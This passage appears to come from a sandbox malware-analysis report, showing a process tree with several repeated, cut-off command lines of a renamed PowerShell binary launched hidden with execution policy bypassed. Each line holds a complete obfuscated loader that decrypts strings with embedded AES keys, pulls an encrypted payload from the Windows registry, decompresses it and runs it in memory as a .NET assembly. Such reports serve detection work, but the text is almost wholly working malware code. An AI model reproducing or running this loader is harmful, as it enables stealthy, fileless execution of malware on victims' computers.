'').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:8844
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3076" "3216" "3144" "3220" "0" "0" "3224" "0" "0" "0" "0" "0"
        33⤵
        
        PID:3936
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        
        PID:4228
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        
        PID:10232
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        
        PID:8472
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 